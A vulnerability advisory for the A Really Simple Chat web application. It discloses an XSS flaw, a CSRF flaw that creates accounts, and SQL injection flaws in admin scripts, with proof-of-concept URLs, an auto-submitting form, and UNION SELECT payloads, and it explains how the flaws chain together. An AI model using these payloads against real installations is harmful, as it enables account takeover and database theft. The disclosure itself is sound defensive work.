High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in A Really Simple Chat (ARSC) which could be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks.
Cross-site scripting (XSS) vulnerability in A Really Simple Chat (ARSC): CVE-2011-2180
1.1 The vulnerability exists due to input sanitation error in the “arsc_link” parameter in dereferer.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28documen t.cookie%29;%3C/script%3 E
Cross-site request forgery (CSRF) vulnerabilities in A Really Simple Chat (ARSC)
2.1 The vulnerability exists due to insufficient validation of the request origin in base/admin/add_user.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create arbitrary accounts.
Exploitation example:
<form action=“http://[host]/base/admin/add_user.php” method=“post” name=“main” />
<input name=“arsc_newuser” value=“test” type=“hidden” />
<input type=“submit” id=“btn” name=“submit” value=“Submit ››”>
</form>
<script>
document.getElementById(‘btn’).click();
</scri pt>
SQL injection weakness in A Really Simple Chat (ARSC): CVE-2011-2181
The weakness exists due to input sanitation errors in the “user” parameter in base/admin/edit_user.php, in the “arsc_layout_id” in base/admin/edit_layout.php and in the “arsc_room” parameter in base/admin/edit_room.php. A remote user with administrative privileges can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Combined with vulnerability #2 it is possible for a remote attacker to create an administrative account and then use it to exploit this weakness.
Exploitation examples:
http://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201, version%28%29,3,4,5,6,7, 8,9,10,11,12,13,14,15%20–%202
http://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select% 201,version%28%29,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2, version%28%29,4,5,6,7%20 --%202
CPE | Name | Operator | Version |
---|---|---|---|
a really simple chat (arsc) | le | 3.3-rc2 |